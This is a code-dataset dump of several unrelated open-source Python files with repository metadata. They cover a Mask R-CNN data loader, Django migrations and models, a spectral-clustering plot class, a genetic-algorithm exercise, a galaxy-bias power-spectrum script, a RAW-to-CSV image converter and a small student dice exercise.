d3865afb9c7300e8cc858ad93c1718ce8a5add80 | 2bbc523c1d75d0fca4956030d95402b78f41413e | /maskrcnn_test/maskrcnn_benchmark/data/build.py | ab04e590bf319467a99c17ac561e5758dbcecdc2 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | ivalab/grasp_primitiveShape | 30d66ac05db07d0b840012154b1653e4f0b00131 | 1d5ce48084e431944fed1239622f3cba97a9edf9 | refs/heads/master | 2022-01-18T21:46:24.276050 | 2021-10-27T22:17:07 | 2021-10-27T22:17:07 | 232,348,859 | 14 | 4 | null | null | null | null | UTF-8 | Python | false | false | 6,781 | py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import bisect
import copy
import logging
import torch.utils.data
from maskrcnn_benchmark.utils.comm import get_world_size
from maskrcnn_benchmark.utils.imports import import_file
from . import datasets as D
from . import samplers
from .collate_batch import BatchCollator
from .transforms import build_transforms
def build_dataset(dataset_list, transforms, dataset_catalog, is_train=True):
"""
Arguments:
dataset_list (list[str]): Contains the names of the datasets, i.e.,
coco_2014_trian, coco_2014_val, etc
transforms (callable): transforms to apply to each (image, target) sample
dataset_catalog (DatasetCatalog): contains the information on how to
construct a dataset.
is_train (bool): whether to setup the dataset for training or testing
"""
if not isinstance(dataset_list, (list, tuple)):
raise RuntimeError(
"dataset_list should be a list of strings, got {}".format(dataset_list)
)
datasets = []
for dataset_name in dataset_list:
data = dataset_catalog.get(dataset_name)
factory = getattr(D, data["factory"])
args = data["args"]
# for COCODataset, we want to remove images without annotations
# during training
if data["factory"] == "COCODataset":
args["remove_images_without_annotations"] = is_train
if data["factory"] == "PascalVOCDataset":
args["use_difficult"] = not is_train
args["transforms"] = transforms
# make dataset from factory
dataset = factory(**args)
datasets.append(dataset)
# for testing, return a list of datasets
if not is_train:
return datasets
# for training, concatenate all datasets into a single one
# TODO(Clark): Not sure if it is good to change here to enlarge the dataset size
# dataset = datasets[0]
datasets.append(datasets[0])
if len(datasets) > 1:
dataset = D.ConcatDataset(datasets)
return [dataset]
def make_data_sampler(dataset, shuffle, distributed):
if distributed:
return samplers.DistributedSampler(dataset, shuffle=shuffle)
if shuffle:
sampler = torch.utils.data.sampler.RandomSampler(dataset)
else:
sampler = torch.utils.data.sampler.SequentialSampler(dataset)
return sampler
def _quantize(x, bins):
bins = copy.copy(bins)
bins = sorted(bins)
quantized = list(map(lambda y: bisect.bisect_right(bins, y), x))
return quantized
def _compute_aspect_ratios(dataset):
aspect_ratios = []
for i in range(len(dataset)):
img_info = dataset.get_img_info(i)
aspect_ratio = float(img_info["height"]) / float(img_info["width"])
aspect_ratios.append(aspect_ratio)
return aspect_ratios
def make_batch_data_sampler(
dataset, sampler, aspect_grouping, images_per_batch, num_iters=None, start_iter=0
):
if aspect_grouping:
if not isinstance(aspect_grouping, (list, tuple)):
aspect_grouping = [aspect_grouping]
aspect_ratios = _compute_aspect_ratios(dataset)
group_ids = _quantize(aspect_ratios, aspect_grouping)
batch_sampler = samplers.GroupedBatchSampler(
sampler, group_ids, images_per_batch, drop_uneven=False
)
else:
batch_sampler = torch.utils.data.sampler.BatchSampler(
sampler, images_per_batch, drop_last=False
)
if num_iters is not None:
batch_sampler = samplers.IterationBasedBatchSampler(
batch_sampler, num_iters, start_iter
)
return batch_sampler
def make_data_loader(cfg, is_train=True, is_distributed=False, start_iter=0):
num_gpus = get_world_size()
if is_train:
images_per_batch = cfg.SOLVER.IMS_PER_BATCH
assert (
images_per_batch % num_gpus == 0
), "SOLVER.IMS_PER_BATCH ({}) must be divisible by the number "
"of GPUs ({}) used.".format(images_per_batch, num_gpus)
images_per_gpu = images_per_batch // num_gpus
shuffle = True
num_iters = cfg.SOLVER.MAX_ITER
else:
images_per_batch = cfg.TEST.IMS_PER_BATCH
assert (
images_per_batch % num_gpus == 0
), "TEST.IMS_PER_BATCH ({}) must be divisible by the number "
"of GPUs ({}) used.".format(images_per_batch, num_gpus)
images_per_gpu = images_per_batch // num_gpus
shuffle = False if not is_distributed else True
num_iters = None
start_iter = 0
if images_per_gpu > 1:
logger = logging.getLogger(__name__)
logger.warning(
"When using more than one image per GPU you may encounter "
"an out-of-memory (OOM) error if your GPU does not have "
"sufficient memory. If this happens, you can reduce "
"SOLVER.IMS_PER_BATCH (for training) or "
"TEST.IMS_PER_BATCH (for inference). For training, you must "
"also adjust the learning rate and schedule length according "
"to the linear scaling rule. See for example: "
"https://github.com/facebookresearch/Detectron/blob/master/configs/getting_started/tutorial_1gpu_e2e_faster_rcnn_R-50-FPN.yaml#L14"
)
# group images which have similar aspect ratio. In this case, we only
# group in two cases: those with width / height > 1, and the other way around,
# but the code supports more general grouping strategy
aspect_grouping = [1] if cfg.DATALOADER.ASPECT_RATIO_GROUPING else []
paths_catalog = import_file(
"maskrcnn_benchmark.config.paths_catalog", cfg.PATHS_CATALOG, True
)
DatasetCatalog = paths_catalog.DatasetCatalog
dataset_list = cfg.DATASETS.TRAIN if is_train else cfg.DATASETS.TEST
transforms = build_transforms(cfg, is_train)
datasets = build_dataset(dataset_list, transforms, DatasetCatalog, is_train)
data_loaders = []
for dataset in datasets:
sampler = make_data_sampler(dataset, shuffle, is_distributed)
batch_sampler = make_batch_data_sampler(
dataset, sampler, aspect_grouping, images_per_gpu, num_iters, start_iter
)
collator = BatchCollator(cfg.DATALOADER.SIZE_DIVISIBILITY)
num_workers = cfg.DATALOADER.NUM_WORKERS
data_loader = torch.utils.data.DataLoader(
dataset,
num_workers=num_workers,
batch_sampler=batch_sampler,
collate_fn=collator,
)
data_loaders.append(data_loader)
if is_train:
# during training, a single (possibly concatenated) data_loader is returned
assert len(data_loaders) == 1
return data_loaders[0]
return data_loaders
| [
"[email protected]"
] | |
0485cdb57fedae3455ec6f17d4568e7e9d1c1f45 | 8908e53525bec8f9a0c9c627be81fa1790c161b2 | /post/migrations/0005_auto_20201031_1114.py | 6776158e7f138adf6b0540695b603daf391bd2fe | [] | no_license | rajni04/farmery | e4033d0f4abc6b4ab086c261ca7d6898d9b5b63d | 3a4a30dab3d614cd4a25b1e5de3e0f5d35bf80b1 | refs/heads/master | 2023-01-08T00:15:20.467363 | 2020-11-01T14:36:45 | 2020-11-01T14:36:45 | 290,197,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | # Generated by Django 3.1 on 2020-10-31 05:44
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('post', '0004_post_content'),
]
operations = [
migrations.AddField(
model_name='post',
name='next_post',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='next', to='post.post'),
),
migrations.AddField(
model_name='post',
name='previous_post',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='previous', to='post.post'),
),
]
| [
"[email protected]"
] | |
27ee3f82f144919b6a6735616610891dbef90858 | 6046c74ff04da073523cb3b843977fd48acbdc0c | /htsint/stats/SpectralClusterResults.py | cbc8a7cb32bccbfdbfaf26c8c31d50c83e69a707 | [
"BSD-3-Clause",
"LicenseRef-scancode-public-domain",
"MIT"
] | permissive | apex-omontgomery/htsint | 24d1c346fd345e2bb56f53e07624615fc36e01a2 | 5f4408c5427db176dc131a1fdab05ba3405aa904 | refs/heads/master | 2022-12-24T08:30:41.108365 | 2016-05-23T04:11:32 | 2016-05-23T04:11:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,361 | py | #!/usr/bin/env python
"""
A generic template
"""
import os,csv
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
__author__ = "Adam Richards"
class SpectralClusterResults(object):
"""
A class to handle spectral clustering results
"""
def __init__(self,silvalsFile,clustersFile):
"""
Constructor
"""
## error checking
for filePath in[silvalsFile,clustersFile]:
if not os.path.exists(filePath):
raise Exception("could not find file: %s"%filePath)
self.clusters = self.load_clusters_file(clustersFile)
self.kRange,self.sigRange,self.silvals = self.load_silvals_file(silvalsFile)
def load_clusters_file(self,clusterFile):
"""
load the clusters file
k,sigma,clustid1,clustid2,....clustid_max
"""
fid = open(clusterFile,'r')
reader = csv.reader(fid)
header = reader.next()
clusterIds = np.array(header[2:])
results = {}
for linja in reader:
k = str(int(linja[0]))
sigma = str(round(float(linja[1]),4))
if not results.has_key(k):
results[k] = {}
results[k][sigma] = np.array([float(i) for i in linja[2:]])
fid.close()
return results
def load_silvals_file(self,silvalsFile):
"""
load the clusters file
k,sigma,clustid1,clustid2,....clustid_max
"""
fid = open(silvalsFile,'r')
reader = csv.reader(fid)
header = reader.next()
kRange = set([])
sigRange = set([])
for linja in reader:
k = int(linja[0])
sigma = round(float(linja[1]),4)
kRange.update([k])
sigRange.update([sigma])
fid.close()
kRange = np.sort(np.array(list(kRange)))
sigRange = np.sort(np.array(list(sigRange)))
## create matrix with k as rows and sigma as columns
resultsMat = np.zeros((kRange.size,sigRange.size),)
fid = open(silvalsFile,'r')
reader = csv.reader(fid)
header = reader.next()
for linja in reader:
k = int(linja[0])
sigma = round(float(linja[1]),4)
kInd = np.where(kRange==k)[0]
sInd = np.where(sigRange==sigma)[0]
resultsMat[kInd,sInd] = float(linja[2])
fid.close()
return kRange,sigRange,resultsMat
def plot(self,threshMax=100,threshMin=5,fontSize=10,fontName='sans-serif',cmap=plt.cm.PuOr,figName='param-scan.png'):
"""
create a heatmap plot
top panel are the sil values
bottom panel denotes cluster sizes with respect to a specified range
"""
clustersMat = np.zeros((self.kRange.size,self.sigRange.size),)
for k in self.kRange:
for sigma in self.sigRange:
clusters = self.clusters[str(k)][str(sigma)]
tooSmall = np.where(clusters < threshMin)[0]
tooLarge = np.where(clusters > threshMax)[0]
tooSmallGenes = np.array([clusters[ts] for ts in tooSmall]).sum()
tooLargeGenes = np.array([clusters[tl] for tl in tooLarge]).sum()
percentAccepted = ((clusters.sum() - tooSmallGenes - tooLargeGenes) / clusters.sum())
kInd = np.where(self.kRange==k)[0]
sInd = np.where(self.sigRange==sigma)[0]
clustersMat[kInd,sInd] = percentAccepted
## get best
combined = clustersMat + self.silvals
cols = np.argsort(combined.max(axis=0))[::-1][:3]
rows = np.argsort(combined.max(axis=1))[::-1][:3]
print("The maximimum values are:")
print("best k: %s"%self.kRange[rows[0]])
print("best sigma: %s"%self.sigRange[cols[0]])
## create the figure
fig = plt.figure(figsize=(7,6))
ax1 = plt.subplot2grid((2, 5), (0, 0),colspan=4)
ax2 = plt.subplot2grid((2, 5), (1, 0),colspan=4)
ax4 = plt.subplot2grid((2, 5), (0, 4),rowspan=2)
## sil value panel
ax1.plot(cols,rows,color='k',marker='x',markersize=5,markeredgewidth=4,linestyle='None')
p1 = ax1.imshow(self.silvals, interpolation='nearest',vmin=-1.0,vmax=1.0, origin='lower',aspect='auto',cmap=cmap)
ax1.set_xticks(range(self.sigRange.shape[0]))
ax1.set_yticks(range(self.kRange.shape[0]))
ax1.set_xticklabels([round(i,2) for i in self.sigRange],rotation=45,fontsize=fontSize,fontname=fontName)
ax1.set_yticklabels([int(round(i)) for i in self.kRange],fontsize=fontSize,fontname=fontName)
ax1.set_title("Silhouette values",fontsize=fontSize+2,fontname=fontName)
ax1.set_ylabel(r"$k$",fontsize=fontSize+1,fontname=fontName)
ax1.set_xlabel(r"$\sigma$",fontsize=fontSize+1,fontname=fontName)
#ax1.yaxis.set_major_locator(MaxNLocator(5))
## cluster size panel
ax2.plot(cols,rows,color='k',marker='x',markersize=5,markeredgewidth=4,linestyle='None')
p2 = ax2.imshow(clustersMat, interpolation='nearest',vmin=-1.0,vmax=1.0, origin='lower',aspect='auto',cmap=cmap)
ax2.set_xticks(range(self.sigRange.shape[0]))
ax2.set_yticks(range(self.kRange.shape[0]))
ax2.set_xticklabels([round(i,2) for i in self.sigRange],rotation=45,fontsize=fontSize,fontname=fontName)
ax2.set_yticklabels([int(round(i)) for i in self.kRange],fontsize=fontSize,fontname=fontName)
ax2.set_title(r"Cluster size $\geq " + str(threshMin) + "$ and $\leq " + str(threshMax) + "$ (%)",fontsize=fontSize+2,fontname=fontName)
ax2.set_ylabel(r"$k$",fontsize=fontSize+1,fontname=fontName)
ax2.set_xlabel(r"$\sigma$",fontsize=fontSize+1,fontname=fontName)
#ax2.yaxis.set_major_locator(MaxNLocator(5))
## add text
plt.figtext(0.07,0.92,"A",weight='bold')
plt.figtext(0.07,0.42,"B",weight='bold')
## colorbar
norm = mpl.colors.Normalize(vmin=-1.0, vmax=1.0)
cb1 = mpl.colorbar.ColorbarBase(ax4,cmap=cmap,norm=norm,orientation='vertical')
fig.subplots_adjust(wspace=0.45,hspace=0.5)
plt.savefig(figName,dpi=400)
if __name__ == "__main__":
print "Running..."
| [
"[email protected]"
] | |
41ae2604c48a9730f3d33ab619376565bf36e041 | a0410af9159861d466a055d8f66cc06fc151f0fd | /GenAlgorithm.py | c4b1f774eda891d506a59482d8d8565d70bf33f8 | [] | no_license | ArgaMelvern/GeneticAlgorithm | f8580cdfa085cfb14b897e84439b7c2adaf7b605 | e36989b0625578b86d0909fa53a82d61a8f8b7ef | refs/heads/main | 2023-04-04T22:09:25.226797 | 2021-04-21T11:23:10 | 2021-04-21T11:23:10 | 360,138,908 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,365 | py | # -*- coding: utf-8 -*-
"""GA Kel 8.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1vMvWFQ0GWGaW3TqwS53j5FeWpNFy9Fbv
h(x,y) = (x^2 * sin y^2) + (x + y)
-1 โค x โค 2 dan -1 โค y โค 1
"""
import random
import math
import pandas as pd
"""# Fungsi Bantuan"""
# Membuat Kromosom Populasi
def generatePopulation(sum_pop, bitnum) :
pops = []
for i in range (sum_pop) :
chromosomes = []
for i in range (bitnum) :
chromosomes.append(random.choice([0,1]))
pops.append(chromosomes)
return pops
# Mengubah X dan Y dari Biner menjadi Float
def convert(bin_x, bitnum, ra, rb) :
ret = []
a = ra - rb
b = 0
for i in range (1, bitnum+1) :
b += 2 ** (i*-1)
c = 0
for i in range (len(bin_x)) :
temp = 0
c = 0
for j in range (bitnum) :
temp = (j+1)*-1
c += bin_x[i][j] * (2**temp)
sum = rb + ((a / b) * c)
ret.append(sum)
return ret
# Menggabungkan kromosom X dan Y
def combineChrom(bin_x,bin_y) :
new_population = []
for i in range(len(bin_x)):
new_population.append(bin_x[i] + bin_y[i])
return new_population
# Menghitung nilai fitness dari X dan Y
def computeFitness(dec_x, dec_y) :
ret = []
for i in range(len(dec_x)) :
x = dec_x[i]
y = dec_y[i]
sum = (x**2 * math.sin(y**2)) + (x+y)
ret.append(sum)
return ret
"""# Seleksi Orang tua dan Crossover"""
# seleksi orangtua
def ParentSelRoulette(new_population,arr_fit,sum_pop):
sumFit = 0
getChance = []
sumChance = []
#Total Fitness
for i in range(sum_pop):
sumFit += arr_fit[i]
#Normalisasi Fitness / Persentase
for i in range(sum_pop):
getChance.append(arr_fit[i] / sumFit)
#Total Normalisasi Fitness
sumFit = 0
for i in range(sum_pop):
sumFit += getChance[i]
sumChance.append(sumFit)
Parent = []
for i in range(2):
rand = random.uniform(0,sumFit)
for j in range(sum_pop):
if sumChance[j] > rand :
Parent.append(new_population[j])
if len(Parent) == 2:
return Parent[i-1],Parent[i]
return Parent[0],Parent[1]
#crossover
def crossOver(Parent1,Parent2):
child1,child2 = [],[]
prob = random.random()
if prob < 0.9 :
Halfing = random.randint(0,len(Parent1)-1)
child1[:Halfing],child1[Halfing:] = Parent1[:Halfing],Parent2[Halfing:]
child2[:Halfing],child2[Halfing:] = Parent2[:Halfing],Parent1[Halfing:]
return child1,child2
else :
return Parent1,Parent2
# Mencari nilai fitness maksimum
def findMaxFitness(fit_xy) :
max = fit_xy[0]
for i in range(1, len(fit_xy)-1) :
if fit_xy[i] > max :
max = fit_xy[i]
return max
# Mencari 2 index fitness tertinggi
def find2IdxMaxFitness(fit_xy) :
max1 = 0
max2 = -1
max = fit_xy[0]
for i in range(1, len(fit_xy)-1) :
if fit_xy[i] > fit_xy[max1] :
max1 = i
if max1 == 0 :
max2 = 1
else :
max2 = 0
for i in range(1, len(fit_xy)-1) :
if fit_xy[i] > fit_xy[max2] and i != max1 :
max2 = i
return max1,max2
# Perhitungan untuk mutasi
def mutation (chromosome) :
newChromosome = chromosome
rand = random.randint(1,10)
if rand == 1 :
rand2 = random.randint(0, len(chromosome) - 1)
if newChromosome[rand2] == 0 :
newChromosome[rand2] = 1
else :
newChromosome[rand2] = 0
return newChromosome
# Membuat generasi baru
def regeneration(xy, fit_xy, sum_pop) :
newGen = []
max1, max2 = find2IdxMaxFitness(fit_xy)
newGen.append(xy[max1])
newGen.append(xy[max2])
for i in range ((sum_pop//2)-1) :
parents1,parents2 = ParentSelRoulette(xy,fit_xy,sum_pop)
childs1,childs2 = crossOver(parents1,parents2)
childs1 = mutation(childs1)
childs2 = mutation(childs2)
newGen.append(childs1)
newGen.append(childs2)
return newGen
def split(chrom,check=False):
split = len(chrom) // 2
if check == True :
return chrom[:split]
return chrom[split:]
"""# Fungsi Main"""
# Parameter umum
sum_pop = 20
bitnum = 3
raX = 2
raY = 1
rbXY = -1
# Variabel variabel penting
bin_x = generatePopulation(sum_pop, bitnum)
bin_y = generatePopulation(sum_pop, bitnum)
dec_x = convert(bin_x, bitnum, raX, rbXY)
dec_y = convert(bin_y, bitnum, raY, rbXY)
fit_xy = computeFitness(dec_x, dec_y)
# Proses
xy = combineChrom(bin_x, bin_y)
best_fit = []
best_chrome = []
best_fit.append(findMaxFitness(fit_xy))
for i in range (50) :
next_xy = regeneration(xy,fit_xy, sum_pop)
fit_xy = []
next_x = []
next_y = []
for j in range (sum_pop) :
next_x.append(split((next_xy[j]),check=True))
next_y.append(split((next_xy[j])))
next_dec_x = convert(next_x, bitnum, raX, rbXY)
next_dec_y = convert(next_y, bitnum, raY, rbXY)
fit_xy = computeFitness(next_dec_x, next_dec_y)
xy = next_xy
a, b = find2IdxMaxFitness(fit_xy)
best_chrome.append(a)
best_fit.append(findMaxFitness(fit_xy))
best_xy, temp = find2IdxMaxFitness(fit_xy)
# Output solusi terbaik
print("best solution : ", findMaxFitness(fit_xy))
print("chromosome : ", xy[best_xy])
print("x = ", next_dec_x[best_xy])
print("y = ", next_dec_y[best_xy])
| [
"[email protected]"
] | |
86e26bb2ee53eacf2538f4609492b9edef7c6ffc | 6a69c5c22877c5eefd64302e17bef821ad384100 | /compute_galaxy_bias_perturbative.py | 5213c09c982799cbed8d4bbf6c339b6c9221171f | [] | no_license | BenWibking/FAST-PT | bf37e78b31714a8bae7d77424d3413cb93cef164 | 945827ae747e03c6a7041faf3a684b5c4859d28d | refs/heads/master | 2021-04-25T06:59:35.130595 | 2018-02-20T18:51:01 | 2018-02-20T18:51:01 | 122,223,749 | 0 | 0 | null | 2018-02-20T16:26:19 | 2018-02-20T16:26:19 | null | UTF-8 | Python | false | false | 6,212 | py | '''
Compute perturbative galaxy bias model.
Based on 'fastpt_example_plot.py' included in FAST-PT (commit 19472bf)
Ben Wibking, Feb. 2018
'''
import numpy as np
import scipy.integrate as integrate
from scipy.interpolate import interp1d
import FASTPT
import HT
def j0(x):
return ( np.sin(x) / x )
def j1(x):
return ( (np.sin(x)/x**2) - (np.cos(x)/x) )
def bin_avg_spherical_j0(k,rminus,rplus):
"""compute the bin-averaged spherical Bessel function j0."""
integral = lambda r: r**2 * j1(k*r) / k
return (3.0 / (rplus**3 - rminus**3)) * (integral(rplus) - integral(rminus))
def xi_fftlog(k,pk):
alpha_k=1.5
beta_r=-1.5
mu=.5
pf=(2*np.pi)**(-1.5)
r, this_xi = HT.k_to_r(k, pk, alpha_k, beta_r, mu, pf)
return r, this_xi
def xi_simple_binaverage(k_in,pk_in,rmin=0.1,rmax=130.0,nbins=200):
"""compute the integral of bessel function
over the galaxy power spectrum to obtain the 3d real-space correlation function."""
bins = np.logspace(np.log10(rmin),np.log10(rmax),nbins+1)
binmin = bins[:-1]
binmax = bins[1:]
bins = zip(binmin, binmax)
r = 0.5*(binmin+binmax)
xi = np.empty(binmin.shape[0])
pk_interp = interp1d(k_in,pk_in)
super_fac = 16
k = np.logspace(np.log10(k_in[0]),np.log10(k_in[-1]),k_in.shape[0]*super_fac)
pk = pk_interp(k)
for i, (rminus, rplus) in enumerate(bins):
# compute signal in bin i on the interval [rminus, rplus)
y = k**2 / (2.0*np.pi**2) * bin_avg_spherical_j0(k,rminus,rplus) * pk
result = integrate.simps(y*k, x=np.log(k)) # do integral in d(ln k)
xi[i] = result
return r,xi
# load the input power spectrum data
# (TODO: call pycamb directly)
d=np.loadtxt('Pk_test.dat')
kin=d[:,0]
Pin=d[:,1]
#k = kin
#P = Pin
#from P_extend import k_extend
#extrap = k_extend(kin, high=2.0) # log10
#k = extrap.extrap_k()
#P = extrap.extrap_P_high(Pin)
npoints = 6000
power=interp1d(kin,Pin)
k=np.logspace(np.log10(kin[0]),np.log10(kin[-1]),npoints)
P=power(k)
print('k-points: {}'.format(k.shape[0]))
print('kmin = {}; kmax = {}'.format(np.min(k),np.max(k)))
print('dk/k = {}'.format(np.max(np.diff(k)/k[:-1])))
P_window=np.array([.2,.2])
C_window=.65
nu=-2; n_pad=1000
# initialize the FASTPT class
log_kmin = -5.0
log_kmax = 3.0 # extrapolating too far increases noise in P_{1loop}, thus in P_gg
fastpt=FASTPT.FASTPT(k,nu,low_extrap=log_kmin,high_extrap=log_kmax,n_pad=n_pad,verbose=True)
P_lin, Pd1d2, Pd2d2, Pd1s2, Pd2s2, Ps2s2, sig4 = fastpt.P_bias(P,C_window=C_window)
# **DO NOT** subtract asymptotic terms according to the user manual
#Pd2d2 -= 2.0*sig4
#Pd2s2 -= (4./3.)*sig4
#Ps2s2 -= (8./9.)*sig4
# now add P_spt to P_lin *after* computing bias terms
P_spt=fastpt.one_loop(P,C_window=C_window)
def galaxy_power(b1,b2,bs):
# P+P_spt below should be the full nonlinear power spectrum, in principle
# (might want to replace it with HALOFIT power spectrum?)
P_g = (b1**2)*(P+P_spt) + (b1*b2)*Pd1d2 + (1./4.)*(b2**2)*Pd2d2 + (b1*bs)*Pd1s2 + (1./2.)*(b2*bs)*Pd2s2 + (1./4.)*(bs**2)*Ps2s2
return P_g
import matplotlib.pyplot as plt
from matplotlib.ticker import FormatStrFormatter
fig=plt.figure()
x1=10**(-2.5)
x2=1e2
ax1=fig.add_subplot(111)
ax1.set_ylim(1e-2,1e5)
ax1.set_xlim(x1,x2)
ax1.set_xscale('log')
ax1.set_yscale('log')
ax1.set_ylabel(r'$P(k)$ [Mpc/$h$]$^3$')
ax1.set_xlabel(r'$k$ [$h$/Mpc]')
ax1.xaxis.set_major_formatter(FormatStrFormatter('%2.2f'))
ax1.plot(k,P+P_spt, label=r'$P_{lin} + P_{SPT}$', color='black')
def plot_galaxy_power(b1,b2,bs):
P_g = galaxy_power(b1,b2,bs)
mylabel = r'$P_g(b_1={}, b_2={}, b_s={})$'.format(b1,b2,bs)
color = next(ax1._get_lines.prop_cycler)['color']
ax1.plot(k,P_g, label=mylabel, color=color)
ax1.plot(k,-P_g, '--', label=None, alpha=.5, color=color)
plot_galaxy_power(1.5, 0., -0.1)
plot_galaxy_power(1.5, 0., 0.1)
plot_galaxy_power(1.5, 0.1, 0.)
plot_galaxy_power(1.5, -0.1, 0.)
plt.grid()
plt.legend(loc='best')
plt.tight_layout()
fig.savefig('galaxy_bias.pdf')
## plot correlation functions
def plot_galaxy_correlation_fftlog(b1,b2,bs):
P_g = galaxy_power(b1,b2,bs)
r, xi_gg = xi_fftlog(k,P_g)
mylabel = r'$\xi_g(b_1={}, b_2={}, b_s={})$'.format(b1,b2,bs)
color = next(ax._get_lines.prop_cycler)['color']
ax.plot(r, xi_gg, label=mylabel, color=color)
ax.plot(r, -xi_gg, '--', label=None, color=color, alpha=.5)
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_xscale('log')
ax.set_yscale('log')
ax.set_xlabel(r'$r$ [Mpc/$h$]')
ax.set_ylabel(r'$\xi(r)$')
r, xi_mm = xi_fftlog(k,P+P_spt)
ax.plot(r, xi_mm, label=r'matter (SPT)', color='black')
plot_galaxy_correlation_fftlog(1.5, 0., -0.1)
plot_galaxy_correlation_fftlog(1.5, 0., 0.1)
plot_galaxy_correlation_fftlog(1.5, 0.1, 0.)
plot_galaxy_correlation_fftlog(1.5, -0.1, 0.)
plt.legend(loc='best')
plt.grid()
plt.tight_layout()
fig.savefig('xi_gg_fftlog.pdf')
## plot (bin-averaged) correlation functions
P_g_linear = galaxy_power(1.5, 0., 0.)
r, xi_gg_linear = xi_simple_binaverage(k,P_g_linear)
def plot_galaxy_correlation_binavg(b1,b2,bs):
P_g = galaxy_power(b1,b2,bs)
r, xi_gg = xi_simple_binaverage(k,P_g)
mylabel = r'$\xi_g(b_1={}, b_2={}, b_s={})$'.format(b1,b2,bs)
color = next(ax._get_lines.prop_cycler)['color']
ax.plot(r, xi_gg/xi_gg_linear, label=mylabel, color=color)
# ax.plot(r, xi_gg, label=mylabel, color=color)
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_xscale('log')
#ax.set_yscale('log')
ax.set_xlabel(r'$r$ [Mpc/$h$]')
ax.set_ylabel(r'$\xi(r)$')
#r, xi_mm = xi_simple_binaverage(k,P+P_spt)
#ax.plot(r, xi_mm, label=r'matter (SPT)', color='black')
#plot_galaxy_correlation_binavg(1.5, 0., -0.2)
#plot_galaxy_correlation_binavg(1.5, 0., -0.1)
#plot_galaxy_correlation_binavg(1.5, 0., 0.1)
#plot_galaxy_correlation_binavg(1.5, 0., 0.2)
plot_galaxy_correlation_binavg(1.5, 0.3, 0.)
plot_galaxy_correlation_binavg(1.5, 0.2, 0.)
plot_galaxy_correlation_binavg(1.5, 0.1, 0.)
plot_galaxy_correlation_binavg(1.5, -0.1, 0.)
plot_galaxy_correlation_binavg(1.5, -0.2, 0.)
plot_galaxy_correlation_binavg(1.5, -0.3, 0.)
plt.legend(loc='best')
plt.grid()
plt.tight_layout()
fig.savefig('xi_gg_binavg.pdf')
| [
"[email protected]"
] | |
655211170d6d0d6bfb67500f2af458a29613249a | 617d3e94e2a30024cd4570ee4f7eec89914d9e47 | /data_analysis_byPro/Day10-05.py | 8cceeeea2f20a129d48b1928155cefb91176a813 | [
"MIT"
] | permissive | yunjung-lee/class_python_data | 5d29fdbc20926de84340ca88c7677c1f3ac03b7c | 67ceab73e67ec63d408894a6ab016a8d25a4e30b | refs/heads/master | 2020-04-02T09:44:59.674102 | 2018-11-09T10:02:21 | 2018-11-09T10:02:21 | 154,307,806 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | # Raw --> CSV
import os
import math
import csv
input_file = 'D:\\images\\Pet_RAW\\Pet_RAW(64x64)\\cat02_64.raw'
output_file = 'D:\\images\\csv\\cat02_64.csv'
header = ['Column', 'Row', 'Value']
with open(input_file, 'rb') as filereader :
with open(output_file, 'w', newline='') as filewriter :
csvWriter = csv.writer(filewriter)
csvWriter.writerow(header)
fsize = os.path.getsize(input_file)
XSIZE = YSIZE = int(math.sqrt(fsize))
for row in range(XSIZE) :
for col in range(YSIZE) :
data = int(ord(filereader.read(1)))
row_list = [col, row, data]
csvWriter.writerow(row_list)
| [
"[email protected]"
] | |
ed41098c79405444ae759362688d2c5fc651be15 | 187e868f562315dd512059a2a582d75311b048d9 | /realeaccounting/models.py | ffd751eae946db4b306c8d505243645ab50ae1b9 | [] | no_license | praveenchouhan411/realeaccounting_repo | 9738133e2fb7ce103b260af952969cff3ffb2bd4 | 206c0985e8cd2d9b860088d8c1f679bd7c80e53c | refs/heads/master | 2021-08-28T10:48:36.084283 | 2017-12-12T01:32:26 | 2017-12-12T01:32:26 | 113,926,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 506 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
# Create your models here.
# Create your models here.
#from django.db import models
#from django import forms
"""
class EmailForm(forms.Form):
firstname = forms.CharField(max_length=255)
lastname = forms.CharField(max_length=255)
email = forms.EmailField()
subject = forms.CharField(max_length=255)
botcheck = forms.CharField(max_length=5)
message = forms.CharField()
"""
| [
"[email protected]"
] | |
4d55ef499a5b486d7757c607457efe537ae426e1 | e50d5d22ba46f17097d5dc86d12ec9d247929468 | /python/kwiver/arrows/core/__init__.py | ef15bfd25ed58f26153ecceff0b3af1098131b32 | [
"BSD-3-Clause"
] | permissive | nrsyed/kwiver | 488a0495b8c3b523f6639669aff73931373d4ca4 | 990a93b637af06129a842be38b88908df358761b | refs/heads/master | 2023-02-25T20:22:10.813154 | 2021-01-21T16:51:23 | 2021-01-21T16:51:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33 | py | from kwiver.arrows.core import *
| [
"[email protected]"
] | |
b9d3d1bb617ba001b6cd6d980b8eb69d8968f7a6 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_125/ch131_2020_04_01_17_27_45_688490.py | 1747626a11ca0c61d555ae4650a131458602343e | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 907 | py | import random
a=int(input('me diga um nรบmero '))
b=int(input('me diga outro nรบmero'))
soma1= a+b
dado1 =random.randint(1,10)
dado2 = random.randint(1,10)
soma2= dado1+dado2
dinheiros = 10
if soma2<a:
print= ('Soma maior')
elif soma2>b:
print= ('Soma menor')
elif soma2==soma1:
print= ('Soma no meio')
